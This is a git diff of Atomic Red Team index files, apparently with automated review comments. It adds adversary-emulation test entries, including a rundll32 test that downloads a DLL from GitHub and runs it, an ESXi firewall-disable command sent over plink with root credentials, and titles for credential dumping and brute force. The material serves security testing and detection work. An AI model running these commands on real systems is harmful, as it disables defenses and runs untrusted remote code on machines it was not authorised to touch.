@@ -731,6 +733,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbrok persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell +persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell 
@@ -850,6 +853,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt +collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell 
@@ -901,6 +905,7 @@ credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell +credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell 
@@ -1008,6 +1013,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index ea1b990398..fd953ca94c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -18,6 +18,7 @@ - Atomic Test #11: Rundll32 with Ordinal Value [windows] - Atomic Test #12: Rundll32 with Control_RunDLL [windows] - Atomic Test #13: Rundll32 with desk.cpl [windows] + - Atomic Test #14: Running DLL with .init extension and function [windows] - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] 
@@ -300,6 +301,7 @@ - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows] - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows] - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows] + - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows] - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows] - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1473,7 +1475,8 @@ - Atomic Test #4: Active Directory Create Admin Account [linux] - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) + - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows] - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) - Atomic Test #1: Create registry persistence via AppCert DLL [windows] - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1776,6 +1779,7 @@ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] + - Atomic Test #10: ESXi - Remove Syslog remote IP [windows] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] @@ -1938,6 +1942,7 @@ - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] + - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] @@ -2152,6 +2157,7 @@ - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows] - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] - Atomic Test #2: Rubeus kerberoast [windows] diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md index 8be13605ae..1346b07b4f 100644 --- a/atomics/Indexes/Indexes-Markdown/office-365-index.md +++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md 
@@ -93,7 +93,7 @@ - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 8b14186cf9..87339692e8 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -18,6 +18,7 @@ - Atomic Test #11: Rundll32 with Ordinal Value [windows] - Atomic Test #12: Rundll32 with Control_RunDLL [windows] - Atomic Test #13: Rundll32 with desk.cpl [windows] + - Atomic Test #14: Running DLL with .init extension and function [windows] - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] 
@@ -194,6 +195,7 @@ - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows] - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows] - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows] + - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows] - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows] - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1021,7 +1023,8 @@ - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) + - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows] - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) - Atomic Test #1: Create registry persistence via AppCert DLL [windows] - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1230,6 +1233,7 @@ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] + - Atomic Test #10: ESXi - Remove Syslog remote IP [windows] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #7: Windows Screencapture [windows] - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows] @@ -1335,6 +1339,7 @@ - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] + - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] @@ -1487,6 +1492,7 @@ - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows] - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) - Atomic Test #1: Request for service tickets [windows] - Atomic Test #2: Rubeus kerberoast [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 48e9480f86..82b50bff63 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -54,7 +54,7 @@ | | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | | | | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | +| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | | | | [Event Triggered Execution: AppCert 
DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 1f2b376a9e..0c7025e1a6 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -41,7 +41,7 @@ | | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | | | | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | +| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent 
PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | | diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml index d19354c6dd..02453c6916 100644 --- a/atomics/Indexes/azure-ad-index.yaml +++ b/atomics/Indexes/azure-ad-index.yaml 
@@ -30176,7 +30176,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -30228,6 +30228,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml index c1b78023fc..f951d529ac 100644 --- a/atomics/Indexes/containers-index.yaml +++ b/atomics/Indexes/containers-index.yaml @@ -29916,7 +29916,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29968,6 +29968,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml index 22be6495b4..2018a18a03 100644 --- a/atomics/Indexes/google-workspace-index.yaml +++ b/atomics/Indexes/google-workspace-index.yaml 
@@ -29478,7 +29478,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29530,6 +29530,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml index 8691b2b794..0c2af3ad72 100644 --- a/atomics/Indexes/iaas-index.yaml +++ b/atomics/Indexes/iaas-index.yaml @@ -29362,7 +29362,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29414,6 +29414,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml index 03306273e8..9b1221e854 100644 --- a/atomics/Indexes/iaas_aws-index.yaml +++ b/atomics/Indexes/iaas_aws-index.yaml 
@@ -29733,7 +29733,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29785,6 +29785,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml index 2f3a98981d..a401d979ac 100644 --- a/atomics/Indexes/iaas_azure-index.yaml +++ b/atomics/Indexes/iaas_azure-index.yaml @@ -29757,7 +29757,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29809,6 +29809,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml index 4a5726e3a7..cd14bb76a3 100644 --- a/atomics/Indexes/iaas_gcp-index.yaml +++ b/atomics/Indexes/iaas_gcp-index.yaml 
@@ -29711,7 +29711,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29763,6 +29763,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af1bd369c2..3a56c2eddf 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -684,6 +684,35 @@ defense-evasion: copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr + - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 + description: | + This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. + DLL created with the AtomicTestHarnesses Portable Executable Builder script. + supported_platforms: + - windows + input_arguments: + dll_file: + description: The DLL file to be called + type: string + default: PathToAtomicsFolder\T1218.011\bin\_WT.init + dll_url: + description: The URL to the DLL file that must be downloaded + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init + dependency_executor_name: powershell + dependencies: + - description: The DLL file to be called must exist at the specified location + (#{dll_file}) + prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" + executor: + command: 'rundll32.exe #{dll_file},krnl + + ' + name: command_prompt T1027.009: technique: modified: '2023-09-29T21:14:57.263Z' 
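Review bot: In the `Running DLL with .init extension and function` entry, `get_prereq_command` downloads `_WT.init` from a `raw/master` URL and the executor then loads it with rundll32 without any integrity check, so whatever sits at that branch path at run time is what executes. Pin `dll_url` to a commit and make `prereq_command` verify the file, e.g. `if ((Get-FileHash "#{dll_file}" -Algorithm SHA256).Hash -eq "<EXPECTED_SHA256>") {exit 0} else {exit 1}` (placeholder hash). `#{dll_file}` is also unquoted in `rundll32.exe #{dll_file},krnl`, so a path containing spaces breaks the call. The same entry is repeated in windows-index.yaml, and these index files look generated, so the change belongs in the T1218.011 source YAML.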
@@ -11130,6 +11159,48 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a + description: 'Adversaries may disable the ESXI firewall via ESXCLI + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m + PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n" + cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} + -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n" + name: command_prompt + elevation_required: false T1553.003: technique: x_mitre_platforms: 
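Review bot: The `command` and `cleanup_command` of `ESXi - Disable Firewall via Esxcli` pass the ESXi password as `-pw #{password}`, so it ends up in process-creation logs and any other command-line telemetry on the machine that runs the test. Recent plink releases accept `-pwfile`, and key authentication with `-i` avoids the secret on the command line entirely; either needs a new input argument in place of `password`. `get_prereq_command` also fetches plink.exe from the `latest` path with no version pin or hash check before the binary is handed those credentials. The same pattern appears in `ESXi - Remove Syslog remote IP` further down and in the windows-index.yaml copy of this entry; the indexes look generated, so the fix belongs in the T1562.004 source YAML.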
@@ -60750,7 +60821,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates 
